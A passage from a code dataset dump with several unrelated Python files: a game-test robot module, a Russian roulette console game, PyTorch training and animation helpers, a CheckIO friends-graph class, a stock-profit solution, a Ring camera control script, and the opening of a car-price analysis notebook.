name)\n\t\t\n\t\titem_id = 6\n\t\tif str(item_id) in self.__data.svr_bag.item_list.keys():\n\t\t\tgem = 0\n\t\telse:\n\t\t\tgem = game_table.get_item(item_id=item_id).item_price\n\t\thave_gem = self.__data.svr_login.gem\n\t\tif have_gem < gem:\n\t\t\tlogging.error(\"gem is too little. gem num : %s \" % have_gem)\n\t\t\treturn Response()\n\t\telse:\n\t\t\treturn self.__request.player_name_change(item_id=item_id, name=name, gem=gem)\n\t\n\tdef player_avatar_change(self) -> Response:\n\t\titem_id = 216\n\t\tif str(item_id) in self.__data.svr_bag.item_list.keys():\n\t\t\tcost_type = 0\n\t\t\tgem_num = 0\n\t\telse:\n\t\t\tcost_type = 1\n\t\t\titem_id = -1\n\t\t\tgem_num = game_table.get_item(item_id=item_id).item_price\n\t\tavatar_id = random.randint(0, 5)\n\t\treturn self.__request.player_avatar_change(avatar_id, cost_type, gem_num, item_id)\n\t\n\tdef add_lord_point(self, item_id=1671) -> Response:\n\t\titems = [1670, 1671]\n\t\thas_item = False\n\t\tfor item in items:\n\t\t\tif str(item) in self.__data.svr_bag.item_list.keys():\n\t\t\t\titem_id = item\n\t\t\t\thas_item = True\n\t\t\t\tbreak\n\t\tprice = game_table.get_item(item_id=item_id).item_price\n\t\tif has_item:\n\t\t\treturn self.__request.item_use(item_id, self.__uid, action_type=-1, rally_war_id=0, is_attack=0)\n\t\telse:\n\t\t\treturn self.__request.item_buy_and_use(item_id, self.__uid, price, action_type=-1, rally_id=0, is_attack=0)\n\t\n\tdef reset_skill(self) -> Response:\n\t\titem_id = 350\n\t\tif str(item_id) in self.__data.svr_bag.item_list.keys():\n\t\t\tcost_type = 0\n\t\telse:\n\t\t\tcost_type = 1\n\t\tprice = game_table.get_item(item_id=item_id).item_price\n\t\treturn self.__request.lord_skill_reset(cost_type=cost_type, gem_num=price, item_id=item_id)\n\t\n\tdef add_all_resource(self, resource_num: int = 1000000) -> Response:\n\t\tif resource_num <= 1000000:\n\t\t\treturn self.__request.op_self_add_clear_resource(resource_num=resource_num)\n\t\telse:\n\t\t\tresult = None\n\t\t\tfor resource_id in range(0, 5):\n\t\t\t\tresult = self.__request.op_self_set_resource(rss_id=resource_id, rss_num=resource_num)\n\t\t\t\tif result.is_right_ret_code:\n\t\t\t\t\tcontinue\n\t\t\t\telse:\n\t\t\t\t\tbreak\n\t\t\treturn result\n\t\n\tdef use_buff_item(self, item_id: int):\n\t\tif str(item_id) not in self.__data.svr_bag.item_list.keys():\n\t\t\tlogging.error(\"No this item\".title())\n\t\t\treturn False\n\t\treturn self.__request.item_use(item_id=item_id, target_id=-1, action_type=-1, rally_war_id=0, is_attack=0)\n\t\n\tdef set_all_build_level(self, level: int):\n\t\town_builds = self.__data.svr_building.building\n\t\tfor build_pos, build_info in own_builds.items():\n\t\t\tbuild_pos = int(build_pos)\n\t\t\tif build_pos == 2 or build_pos == 33 or build_pos == 3:\n\t\t\t\tcontinue\n\t\t\tif build_info[-1] >= level:\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tif not self.__request.op_self_set_pos_building_lv(build_pos, level).is_right_ret_code:\n\t\t\t\t\tbreak\n\t\n\tdef mail_send(self, player_name):\n\t\t\n\t\tmail_type = 0\n\t\t\n\t\timport util\n\t\timport random\n\t\tchat_path = util.get_ini_data(conf_path, section=\"path\", section_item=\"chat_path\")\n\t\tchat_data = util.read_json_file(file_path=chat_path)\n\t\t\n\t\tdata_key = str(random.randint(0, len(chat_data) - 1))\n\t\tcontent = chat_data[data_key]\n\t\t\n\t\treturn self.__request.mail_send(mail_type=mail_type, target_name=player_name, 
content=content)\n","sub_path":"tools/okc_robot/module/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":3758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"119361833","text":"from random import*\r\n\r\ndeath = False\r\nend = False\r\nnumberEss = 0\r\n\r\nprint(\"How many bullets do you want to play with?\")\r\nprint(\"max = 6, min = 0\")\r\nball = int(input())\r\nwhile ball > 6 or ball < 0:\r\n print(\"Impossible value, try another one\")\r\n ball = int(input())\r\n\r\nwhile not death and not end:\r\n print(\"Do you want to spin the cylinder?\")\r\n print(\"yes/no\")\r\n answer = input()\r\n if answer == \"yes\":\r\n numberEss += 1\r\n if ball != 0:\r\n shotStop = randrange(6)\r\n if (ball-1) >= shotStop:\r\n print(\"That was your last try\")\r\n death = True\r\n else:\r\n print(\"You are lucky, you are still alive\")\r\n else:\r\n print(\"You cannot lose, why do you want to play?\")\r\n else:\r\n print(\"Do you want to stop playing?\")\r\n print(\"yes/no\")\r\n answer = input()\r\n if answer == \"yes\":\r\n end = True\r\n\r\nif death:\r\n print(\"You died after\", numberEss, \"tries\")\r\nelse:\r\n print(\"You are still alive. You survived\", numberEss, \"tries\")\r\n","sub_path":"Russian roulette.py","file_name":"Russian roulette.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"}
+{"seq_id":"535262532","text":"import numpy as np\nimport torch as th\nimport os\nimport time\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nfrom multiprocessing import Pool\nimport configuration as cfg\n\n# ONLY DEV\nimport sys\n\n\ndef sprint(obj, obj_name=\"Object\", complete=False, exit=False):\n print(\"Printing out\", obj_name)\n print(type(obj))\n\n if (isinstance(obj, th.Tensor)):\n obj = obj.cpu().detach().numpy()\n\n if (isinstance(obj, np.ndarray)):\n print(obj.shape)\n\n if (complete):\n print(obj)\n\n if(exit):\n sys.exit()\n \ndef set_up_batch(_iter, data_filenames):\n \"\"\"\n In this function, a batch is composed to be fed into the network.\n :param _iter: The iteration of the current epoch\n :param data_filenames: The paths to the data files\n :return: Two lists: one with network inputs, and another one with\n corresponding labels\n \"\"\"\n\n # Determine which inputs of the 16x16 default input field are the center for\n # this pk_rows and pk_cols set up\n data_xmin = int(8 - np.floor(cfg.PK_COLS / 2.))\n data_xmax = int(8 + np.ceil(cfg.PK_COLS / 2.))\n data_ymin = int(8 - np.floor(cfg.PK_ROWS / 2.))\n data_ymax = int(8 + np.ceil(cfg.PK_ROWS / 2.))\n\n # Get width and height of the visual field of the network\n width, height = data_xmax - data_xmin, data_ymax - data_ymin\n\n # Load data from file\n # TOASK Why +1 ?\n # Probably because of the shift in the input and output array\n data = np.load(data_filenames[_iter])[:cfg.SEQ_LEN + 1]\n\n # data.shape = (cfg.SEQ_LEN +1 , 2, 16, 16)\n\n # for sample in range(len(data_filenames)):\n\n # \n\n # print(\"\\nsample:\",sample)\n\n\n # for item in range(40):\n # for i in range(width):\n # for j in range(height):\n # cur = data[item,:,i,j]\n # if(not np.isclose(cur[1],0.0)):\n # print(\"=== Sample:\", sample, \", Sequenz:\", item,\" ===\")\n # print(f\"[{i}|{j}]: {cur}\")\n \n\n # Generate a random position for the visual field\n x = np.random.randint(0, max(1, 15 - width))\n y = np.random.randint(0, max(1, 15 - 
height))\n\n # Sub select only the data values that are of interest\n data = data[:, :, x:x + width, y:y + height]\n\n # Get first and second dimension of data\n dim0, dim1 = np.shape(data)[:2]\n\n # # In case the desired field is larger than 16x16 pixels (which is the data\n # # dimension), pad the data with zeros\n # if cfg.PK_ROWS >= 16 or cfg.PK_COLS >= 16:\n # data = np.pad(\n # array=data,\n # pad_width=((0, 0),\n # (0, 0),\n # (0, cfg.PK_ROWS - 16),\n # (0, cfg.PK_COLS - 16)),\n # mode=\"constant\",\n # constant_values=0\n # )\n\n # Reshape the data array to have the kernels on one dimension\n data = np.reshape(data, [dim0, dim1, cfg.PK_ROWS * cfg.PK_COLS])\n # data.shape = (41, 2, 256)\n \n\n # Swap the second and third dimension of the data\n data = np.swapaxes(data, axis1=1, axis2=2)\n # shape = (41, 256, 2)\n\n # Split the data into inputs (where some noise is added) and labels\n # Add noise to all timesteps except very last one\n _net_input = np.array(\n data[:-1] + np.random.normal(0, cfg.DATA_NOISE, np.shape(data[:-1])),\n dtype=np.float32\n )\n # shape: (40, 256, 2)\n\n # noise = cfg.DATA_NOISE\n # _net_input = np.array(\n # data[:-1] + np.random.uniform(-noise, noise, np.shape(data[:-1])),\n # dtype=np.float32\n # )\n _net_label = np.array(data[1:, :, 0:1], dtype=np.float32)\n # shape: (40, 256, 1)\n \n\n if cfg.TRAINING:\n # Set the dynamic inputs with a certain probability to zero to force\n # the network to use lateral connections\n _net_input *= np.array(\n np.random.binomial(n=1, p=1 - cfg.P_ZERO_INPUT,\n size=_net_input.shape),\n dtype=np.float32\n )\n\n return _net_input, _net_label\n\n\ndef evaluate(net, data_filenames, params, tensors, pk_batches, criterion=None,\n optimizer=None, _iter=0, testing=False):\n \"\"\"\n This function evaluates the network for given data and optimizes the weights\n if an optimizer is provided.\n :param net: The network\n :param data_filenames: The filenames where the data to forward are lying\n :param params: The parameters of the network\n :param tensors: The tensors of the network\n :param pk_batches: The number of batches for the PKs\n :param criterion: The criterion to measure the error\n :param optimizer: The optimizer to optimize the weights\n :param _iter: The current iteration of e.g. 
the training\n :param testing: Bool that determines weather network is being tested\n :return: The error, net inputs, net labels and net outputs\n \"\"\"\n\n seq_len = cfg.SEQ_LEN if not testing\\\n else cfg.TEACHER_FORCING_STEPS + cfg.CLOSED_LOOP_STEPS\n\n # Generate the training data batch for this iteration\n net_input, net_label = set_up_batch(\n _iter=_iter,\n data_filenames=data_filenames\n )\n\n # Set up an array of zeros to store the network outputs\n net_outputs = th.zeros(size=(seq_len,\n pk_batches,\n params.pk_dyn_out_size))\n\n if optimizer:\n # Set the gradients back to zero\n optimizer.zero_grad()\n\n # Reset the network to clear the previous sequence\n net.reset(pk_num=pk_batches)\n\n # Iterate over the whole sequence of the training example and perform a\n # forward pass\n for t in range(seq_len):\n\n # Prepare the network input for this sequence step\n if testing and t > cfg.TEACHER_FORCING_STEPS:\n #\n # Closed loop - receiving the output of the last time step as\n # input\n dyn_net_in_step = net_outputs[t - 1].detach().numpy()\n else:\n #\n # Teacher forcing\n\n # Set the dynamic input for this iteration\n dyn_net_in_step = net_input[t, :, :params.pk_dyn_out_size]\n\n # Forward the input through the network\n net.forward(dyn_in=dyn_net_in_step)\n\n # Store the output of the network for this sequence step\n net_outputs[t] = tensors.pk_dyn_out\n\n mse = None\n\n if criterion:\n # Get the mean squared error from the evaluation list\n mse = criterion(net_outputs, th.from_numpy(net_label))\n # Alternatively, the mse can be calculated 'manually'\n # mse = th.mean(th.pow(net_outputs - th.from_numpy(net_label), 2))\n\n if optimizer:\n mse.backward()\n optimizer.step()\n\n return mse, net_input, net_label, net_outputs\n\n\ndef determine_device():\n \"\"\"\n This function evaluates whether a GPU is accessible at the system and\n returns it as device to calculate on, otherwise it returns the CPU.\n :return: The device where tensor calculations shall be made on\n \"\"\"\n device = th.device(\"cuda\" if th.cuda.is_available() else \"cpu\")\n print(\"Using device:\", device)\n print()\n\n # Additional Info when using cuda\n if device.type == \"cuda\":\n print(th.cuda.get_device_name(0))\n print(\"Memory Usage:\")\n print(\"\\tAllocated:\",\n round(th.cuda.memory_allocated(0) / 1024 ** 3, 1), \"GB\")\n print(\"\\tCached: \", round(th.cuda.memory_cached(0) / 1024 ** 3, 1),\n \"GB\")\n print()\n return device\n\n\ndef save_model_to_file(model_src_path, cfg_file, epoch, epoch_errors_train,\n epoch_errors_val, net):\n \"\"\"\n This function writes the model weights along with the network configuration\n and current performance to file.\n :param model_src_path: The source path where the model will be saved to\n :param cfg_file: The configuration file\n :param epoch: The current epoch\n :param epoch_errors_train: The training epoch errors\n :param epoch_errors_val: The validation epoch errors,\n :param net: The actual model\n :return: Nothing\n \"\"\"\n # print(\"\\nSaving model (that is the network's weights) to file...\")\n\n _model_save_path = model_src_path + \"/\" + cfg.MODEL_NAME + \"/\"\n if not os.path.exists(_model_save_path):\n os.makedirs(_model_save_path)\n\n # Save model weights to file\n th.save(net.state_dict(), _model_save_path + cfg.MODEL_NAME + \".pt\")\n\n output_string = cfg_file + \"\\n#\\n# Performance\\n\\n\"\n\n output_string += \"CURRENT_EPOCH = \" + str(epoch) + \"\\n\"\n output_string += \"EPOCHS = \" + str(cfg.EPOCHS) + \"\\n\"\n output_string += 
\"CURRENT_TRAINING_ERROR = \" + \\\n str(epoch_errors_train[-1]) + \"\\n\"\n output_string += \"LOWEST_TRAINING_ERROR = \" + \\\n str(min(epoch_errors_train)) + \"\\n\"\n output_string += \"CURRENT_VALIDATION_ERROR = \" + \\\n str(epoch_errors_val[-1]) + \"\\n\"\n output_string += \"LOWEST_VALIDATION_ERROR = \" + \\\n str(min(epoch_errors_val))\n\n # Save the configuration and current performance to file\n with open(_model_save_path + 'cfg_and_performance.txt', 'w') as _text_file:\n _text_file.write(output_string)\n\n\ndef plot_kernel_activity(ax, label, net_out, net_in=None, make_legend=False):\n \"\"\"\n This function displays the wave activity of a single kernel.\n :param ax: The plot where the activity shall be displayed in\n :param label: The label for the wave (ground truth)\n :param net_out: The network output\n :param net_in: The network input\n :param make_legend: Boolean that indicates weather a legend shall be created\n \"\"\"\n\n central_kernel = (cfg.PK_ROWS * cfg.PK_COLS) // 2\n central_kernel = 20\n\n if net_in is not None:\n ax.plot(range(len(net_in)), net_in[:, central_kernel, 0],\n label='Network input', color='green')\n ax.plot(range(len(label)), label[:, central_kernel, 0],\n label='Target', color='deepskyblue')\n ax.plot(range(len(net_out)), net_out[:, central_kernel, 0],\n label='Network output', color='red', linestyle='dashed')\n # if net_in is None:\n yticks = ax.get_yticks()[1:-1]\n ax.plot(np.ones(len(yticks)) * cfg.TEACHER_FORCING_STEPS, yticks,\n color='white', linestyle='dotted',\n label='End of teacher forcing')\n if make_legend:\n ax.legend()\n\n\ndef animate_2d_wave(net_label, net_outputs, net_inputs=None):\n \"\"\"\n This function visualizes the spatio-temporally expanding wave\n :param net_label: The corresponding labels\n :param net_outputs: The network output\n :param net_inputs: The network inputs\n :return: The animated plot of the 2d wave\n \"\"\"\n\n num_axes = 2\n\n # Bring the data into a format that can be displayed as heatmap\n data = np.reshape(net_outputs, [len(net_outputs),\n cfg.PK_ROWS,\n cfg.PK_COLS,\n len(net_outputs[0, 0])])\n net_label = np.reshape(net_label, [len(net_label),\n cfg.PK_ROWS,\n cfg.PK_COLS,\n len(net_label[0, 0])])\n\n if net_inputs is not None:\n net_inputs = np.reshape(net_inputs, [len(net_inputs),\n cfg.PK_ROWS,\n cfg.PK_COLS,\n len(net_inputs[0, 0])])\n num_axes = 3\n\n # Define a grid size that shall be visualized\n gs1 = 0\n gs2 = cfg.PK_ROWS\n\n # First set up the figure, the axis, and the plot element we want to\n # animate\n fig, axes = plt.subplots(1, num_axes, figsize=[6*num_axes, 6], dpi=100)\n im1 = axes[0].imshow(net_label[0, gs1:gs2, gs1:gs2, 0], vmin=-0.8, vmax=0.8,\n cmap='Blues')\n\n # Visualize the obstacle if there is one\n txt1 = axes[0].text(0, axes[0].get_yticks()[0], 't = 0', fontsize=20,\n color='white')\n axes[0].set_title(\"Network Output\")\n\n # In the subfigure on the right hand side, visualize the true data\n im2 = axes[1].imshow(net_label[0, gs1:gs2, gs1:gs2, 0], vmin=-0.8, vmax=0.8,\n cmap='Blues')\n axes[1].set_title(\"Ground Truth\")\n\n im3 = None\n if net_inputs is not None:\n im3 = axes[2].imshow(net_inputs[0, gs1:gs2, gs1:gs2, 0], vmin=-0.8,\n vmax=0.8, cmap=\"Blues\")\n axes[2].set_title(\"Network Input\")\n\n anim = animation.FuncAnimation(fig, animate, frames=len(data),\n fargs=(cfg.TEACHER_FORCING_STEPS, data, im1,\n im2, im3, txt1, gs1, gs2, net_label,\n net_inputs),\n interval=1)\n\n return anim\n\n\ndef animate(_i, _teacher_forcing_steps, _data, _im1, _im2, _im3, _txt1, _gs1,\n 
_gs2, _net_label, _net_inputs):\n\n # Pause the simulation briefly when switching from teacher forcing to\n # closed loop prediction\n if _i == _teacher_forcing_steps:\n time.sleep(1.0)\n elif _i < 150:\n time.sleep(0.05)\n\n # Set the pixel values of the image to the data of timestep _i\n _im1.set_array(_data[_i, _gs1:_gs2, _gs1:_gs2, 0])\n if _i < len(_net_label) - 1:\n _im2.set_array(_net_label[_i, _gs1:_gs2, _gs1:_gs2, 0])\n if _im3 is not None:\n _im3.set_array(_net_inputs[_i, _gs1:_gs2, _gs1:_gs2, 0])\n\n # Display the current timestep in text form in the plot\n if _i < _teacher_forcing_steps:\n _txt1.set_text('Teacher forcing, t = ' + str(_i))\n else:\n _txt1.set_text('Closed loop prediction, t = ' + str(_i))\n\n return _im1, _im2, _im3\n","sub_path":"code_archive/model/distana/helper_functions.py","file_name":"helper_functions.py","file_ext":"py","file_size_in_byte":13819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"605560395","text":"#CheckIO Solution to Friends\n\n\n\n'''\nReturns a new Friends instance. \"connections\" is an iterable of sets with two elements in each. \nEach connection contains two names as strings. Connections can be repeated in the initial data, \nbut inside it's stored once. Each connection has only two states - existing or not.\n'''\nclass Friends:\n\n def __init__(self, connections):\n \n self.connections = list(connections)\n \n #Add a connection in the instance. \"connection\" is a set of two names (strings). Returns True if this connection is new. Returns False if this connection exists already.\n def add(self, connection):\n \n if connection in self.connections:\n return False\n \n else:\n self.connections.append(connection)\n return True\n \n #Remove a connection from the instance. \"connection\" is a set of two names (strings). Returns True if this connection exists. Returns False if this connection is not in the instance.\n def remove(self, connection):\n \n if connection in self.connections:\n self.connections.remove(connection)\n return True\n \n else:\n return False\n \n #Returns a set of names. The set contains only names which are connected with somebody.\n def names(self):\n \n nameset = set()\n \n for s in self.connections:\n for n in s:\n if n not in nameset:\n nameset.add(n)\n \n return nameset\n \n #Returns a set of names which is connected with the given \"name\". If \"name\" does not exist in the instance, then return an empty set. 
\n def connected(self, name):\n \n namelist = []\n nset = set()\n [namelist.extend(list(w)) for w in self.connections if name in w]\n nset = set(namelist)\n if name in set(namelist):\n nset.remove(name)\n \n return nset","sub_path":"Friends.py","file_name":"Friends.py","file_ext":"py","file_size_in_byte":2014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"285812727","text":"#/usr/bin/env python\n\n# Author: Wei Tong \n#\n\nclass Solution:\n # @param prices, a list of integer\n # @return an integer\n def maxProfit(self, prices):\n if len(prices) <= 1:\n return 0\n \n delta = []\n for i in range(1, len(prices)):\n delta.append(prices[i] - prices[i-1])\n \n mpos, msum = 0, 0\n for d in delta:\n if mpos <= 0:\n mpos = d\n else:\n mpos += d\n \n if mpos > msum:\n msum = mpos\n return msum\n \n","sub_path":"Best Time to Buy and Sell Stock.py","file_name":"Best Time to Buy and Sell Stock.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"598283814","text":"#Author: Rami Janini\r\n#Version: 1.3: Fixing issues and adding light control.\r\nimport time\r\nfrom getpass import getpass\r\nfrom ring_doorbell import Ring\r\n\r\n\r\nprint('''\r\n\t ___ ___ _\r\n\t / _ \\__ __/ _ \\(_)__ ___ _\r\n\t/ ___/ // / , _/ / _ \\/ _ `/\r\n\t/_/ \\_, /_/|_/_/_//_/\\_, /\r\n\t\t/___/ /___/\r\n\t\t\tAuthor:Rami Janini\r\n\t\t\t\t\t v.1.3\r\n''')\r\n\r\nringEmail = input('Ring Email: ')\r\nringPassword = getpass('Ring Password: ')\r\n\r\nring = Ring(ringEmail, ringPassword)\r\n\r\nringCameras = ring.stickup_cams\r\nringDoorbells = ring.doorbells\r\n\r\n\r\ndef CameraCheck():\r\n\tfor dev in list(ringCameras + ringDoorbells):\r\n\r\n\t\tdev.update()\r\n\r\n\t\tprint('Account ID: %s' % dev.account_id)\r\n\t\tprint('Device Type: %s' % dev.family)\r\n\t\tprint('Address: %s' % dev.address)\r\n\t\tprint('Family: %s' % dev.family)\r\n\t\tprint('ID: %s' % dev.id)\r\n\t\tprint('Name: %s' % dev.name)\r\n\t\tprint('Timezone: %s' % dev.timezone)\r\n\t\tprint('Wifi Name: %s' % dev.wifi_name)\r\n\t\tprint('Wifi RSSI: %s' % dev.wifi_signal_strength)\r\n\t\tprint('Battery Life: %s' % dev.battery_life)\r\n\r\n\r\ndef GetVideo():\r\n\tdef stickCamVideo():\r\n\t\tstickupCamera = ringCameras[0]\r\n\t\tstickupCamera.recording_download(\r\n\t\t\tstickupCamera.history(limit=100, kind='motion')[0],\r\n\t\t\t\t\t\t\t\t\tfilename='last_motion.mp4', override=True)\r\n\r\n\tdef doorbellCamVideo():\r\n\t\tdoorbell = ringCameras[0]\r\n\t\tdoorbell.recording_download(\r\n\t\t\tdoorbell.history(limit=100, kind='motion')[0],\r\n\t\t\t\t\t\t\t\t\tfilename='last_motion.mp4', override=True)\r\n\r\n\twhile True:\r\n\t\tcamFootageDevice = input('Select: 1--> Security Camera Footage 2--> Doorbell Camera Footage 3--> Go Back : ')\r\n\t\tif camFootageDevice == '1':\r\n\t\t\tprint(\"\")\r\n\t\t\tstickCamVideo()\r\n\t\t\tprint(\"\")\r\n\t\telif camFootageDevice == '2':\r\n\t\t\tprint(\"\")\r\n\t\t\tdoorbellCamVideo()\r\n\t\t\tprint(\"\")\r\n\t\telif camFootageDevice == '3':\r\n\t\t\tbreak\r\n\t\telse:\r\n\t\t\tcontinue\r\n\r\ndef GetMotionAlerts():\r\n\r\n\tdef stickCamMotion():\r\n\t\tfor stickup_cams in ringCameras:\r\n\t\t\t#You can change the limit\r\n\t\t\tfor event in stickup_cams.history(limit=10):\r\n\t\t\t\tprint('Footage ID: %s' % event['id'])\r\n\t\t\t\tprint('Kind: %s' % event['kind'])\r\n\t\t\t\tprint('Answered: %s' % event['answered'])\r\n\t\t\t\tprint('Date/Time: %s' % 
event['created_at'])\r\n\t\t\t\tprint('--' * 50)\r\n\t\t\tevents = stickup_cams.history(kind ='motion')\r\n\r\n\tdef doorbellCamMotion():\r\n\t\tfor doorbell in ringDoorbells:\r\n\t\t\t#You can change the limit\r\n\t\t\tfor event in doorbell.history(limit=10):\r\n\t\t\t\tprint('Footage ID: %s' % event['id'])\r\n\t\t\t\tprint('Kind: %s' % event['kind'])\r\n\t\t\t\tprint('Answered: %s' % event['answered'])\r\n\t\t\t\tprint('Date/Time: %s' % event['created_at'])\r\n\t\t\t\tprint('--' * 50)\r\n\t\t\tevents = doorbell.history(kind ='motion')\r\n\twhile True:\r\n\t\tcamMotionDevice = input('Select: 1--> Security Camera Motion Alerts 2--> Doorbell Camera Motion Alerts 3--> Go Back : ')\r\n\t\tif camMotionDevice == '1':\r\n\t\t\tprint(\"\")\r\n\t\t\tstickCamMotion()\r\n\t\t\tprint(\"\")\r\n\t\telif camMotionDevice == '2':\r\n\t\t\tprint(\"\")\r\n\t\t\tdoorbellCamMotion()\r\n\t\t\tprint(\"\")\r\n\t\telif camMotionDevice == '3':\r\n\t\t\tbreak\r\n\t\telse:\r\n\t\t\tcontinue\r\n\r\ndef sirenController():\r\n\tdef stickCamSiren():\r\n\t\tfor dev in list(ringCameras):\r\n\r\n\t\t\tseconds = input('After how many seconds do you want the alarm to be turned off? ')\r\n\t\t\tseconds=int(seconds)\r\n\t\t\tprint(\"Activating alarm for \" + str(seconds) + \" seconds...\")\r\n\t\t\tdev.siren = 60\r\n\t\t\ttime.sleep(seconds)\r\n\t\t\tdev.siren = 0\r\n\r\n\tdef doorbellSiren():\r\n\t\tfor dev in list(ringDoorbells):\r\n\r\n\t\t\tseconds = input('After how many seconds do you want the alarm to be turned off? ')\r\n\t\t\tseconds=int(seconds)\r\n\t\t\tprint(\"Activating alarm for \" + str(seconds) + \" seconds...\")\r\n\t\t\tdev.siren = 60\r\n\t\t\ttime.sleep(seconds)\r\n\t\t\tdev.siren = 0\r\n\r\n\twhile True:\r\n\t\tcamSiren = input('Select: 1--> Turn Security Camera Siren On 2--> Turn Doorbell Siren On 3--> Go Back : ')\r\n\t\tif camSiren == '1':\r\n\t\t\tprint(\"\")\r\n\t\t\tstickCamSiren()\r\n\t\t\tprint(\"\")\r\n\t\telif camSiren == '2':\r\n\t\t\tprint(\"\")\r\n\t\t\tdoorbellSiren()\r\n\t\t\tprint(\"\")\r\n\t\telif camSiren == '3':\r\n\t\t\tbreak\r\n\t\telse:\r\n\t\t\tcontinue\r\n\r\ndef lightControl():\r\n\tdef lightOn():\r\n\t\tfor dev in list(ringCameras + ringDoorbells):\r\n\r\n\t\t\tdev.update()\r\n\r\n\t\t\tif dev.family == 'stickup_cams' and dev.lights:\r\n\t\t\t\tdev.lights = 'on'\r\n\r\n\t\t\tprint('Lights On!')\r\n\r\n\tdef lightOff():\r\n\t\tfor dev in list(ringCameras + ringDoorbells):\r\n\r\n\t\t\tif dev.family == 'stickup_cams' and dev.lights:\r\n\t\t\t\tdev.lights = 'off'\r\n\t\t\tprint('Lights Off!')\r\n\r\n\r\n\twhile True:\r\n\t\tlightControlAnswer = input('Select: 1--> Turn Lights On 2--> TurnLights Off 3--> Go Back : ')\r\n\t\tif lightControlAnswer == '1':\r\n\t\t\tprint(\"\")\r\n\t\t\tlightOn()\r\n\t\t\tprint(\"\")\r\n\t\telif lightControlAnswer == '2':\r\n\t\t\tprint(\"\")\r\n\t\t\tlightOff()\r\n\t\t\tprint(\"\")\r\n\t\telif lightControlAnswer == '3':\r\n\t\t\tbreak\r\n\t\telse:\r\n\t\t\tcontinue\r\n\r\ndef startProgram():\r\n\tprint('Logged in as: ', ringEmail)\r\n\tprint(\"\")\r\n\tprint('Your Devices List:')\r\n\tprint(ringCameras)\r\n\tprint(\"\")\r\n\twhile True:\r\n\t\tanswer = input('Select: 1--> Cameras Check 2--> Motion Footage 3--> Motion Alerts 4--> Siren Controller 5--> Light Controller 6--> Exit :')\r\n\r\n\t\tif answer == '1':\r\n\t\t\tprint(\"\")\r\n\t\t\tCameraCheck()\r\n\t\t\tprint(\"\")\r\n\r\n\t\telif answer == '2':\r\n\t\t\tprint(\"\")\r\n\t\t\tGetVideo()\r\n\t\t\tprint(\"\")\r\n\t\telif answer == 
'3':\r\n\t\t\tprint(\"\")\r\n\t\t\tGetMotionAlerts()\r\n\t\t\tprint(\"\")\r\n\t\telif answer == '4':\r\n\t\t\tprint(\"\")\r\n\t\t\tsirenController()\r\n\t\t\tprint(\"Alarm is off!\")\r\n\t\t\tprint(\"\")\r\n\t\telif answer == '5':\r\n\t\t\tprint(\"\")\r\n\t\t\tlightControl()\r\n\t\t\tprint(\"\")\r\n\t\telif answer == '6':\r\n\t\t\tprint(\"\")\r\n\t\t\tprint(\"Thanks For using PyRing!\")\r\n\t\t\tbreak\r\n\t\telse:\r\n\t\t\tprint(\"\")\r\n\t\t\tprint(\"Invaild input, please choose again!\")\r\n\t\t\tprint(\"\")\r\n\t\t\tcontinue\r\n\r\nstartProgram()\r\n","sub_path":"PyRing.py","file_name":"PyRing.py","file_ext":"py","file_size_in_byte":5586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"440945058","text":"# To add a new cell, type '# %%'\n# To add a new markdown cell, type '# %% [markdown]'\n# %%\nfrom IPython import get_ipython\n\n# %% [markdown]\n# ### 载入包\n\n# %%\n#coding:utf-8\n#导入warnings包,利用过滤器来实现忽略警告语句。\nimport warnings\nwarnings.filterwarnings('ignore')\n\nimport pandas as pd \nimport numpy as np \n\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom operator import itemgetter\n\nget_ipython().run_line_magic('matplotlib', 'inline')\n\n# %% [markdown]\n# ### 载入数据\n\n# %%\npath = 'D:/OneDrive/文档/DeepLearning/secondHandCarPrediction/data/'\n\nTrain_data = pd.read_csv(path + 'train.csv', sep = ' ')\nTest_data = pd.read_csv(path + 'testA.csv', sep = ' ')\nprint('Train data shape:', Train_data.shape)\nprint('TestA data shape:', Test_data.shape)\n\n\n# %%\n# 观察数据,首位各5条记录\nTrain_data.head().append(Train_data.tail())\n\n\n# %%\nTest_data.head().append(Test_data.tail())\n\n# %% [markdown]\n# ### 搞点描述统计\n\n# %%\nTrain_data.info()\n\n\n# %%\nTest_data.info()\n\n# %% [markdown]\n# `notRepairedDamage`变量的类型是object,看看里面是什么臭鱼烂虾\n\n# %%\nTrain_data['notRepairedDamage'].value_counts()\n\n\n# %%\n## “-”不做处理,替换成nan\n# inplace参数默认False,不修改原dataframe的数据\n\nTrain_data['notRepairedDamage'].replace('-', np.nan, inplace = True)\nTest_data['notRepairedDamage'].replace('-', np.nan, inplace = True)\n\n# 把object转化为数值\nTrain_data['notRepairedDamage'] = pd.to_numeric(Train_data['notRepairedDamage'])\nTest_data['notRepairedDamage'] = pd.to_numeric(Test_data['notRepairedDamage'])\n\n\n# %%\nTrain_data['notRepairedDamage'].value_counts()\n\n\n# %%\nTest_data['notRepairedDamage'].value_counts()\n\n# %% [markdown]\n# 搞定`notRepairedDamage`再看一眼\n\n# %%\nTrain_data.info()\n\n\n# %%\n# 标准化\nTrain_data_std = (Train_data - Train_data.mean()) / Train_data.std()\n\n\n# %%\nTrain_data_std.plot.box()\n\n# %% [markdown]\n# 这个`seller`和`offerType`很奇怪的亚子\n\n# %%\nTrain_data[\"seller\"].plot.density()\n\n\n# %%\nsum(Train_data[\"offerType\"])\n\n\n# %%\ndel Train_data[\"seller\"]\ndel Train_data[\"offerType\"]\ndel Test_data[\"seller\"]\ndel Test_data[\"offerType\"]\n\n\n# %%\nTrain_data_std = (Train_data - Train_data.mean()) / Train_data.std()\nTrain_data_std.plot.box()\n\n\n# %%\nTrain_data.columns\n\n# %% [markdown]\n# ### 处理异常值\n\n# %%\ndef outliers_proc(data, col_name, scale=3):\n \"\"\"\n 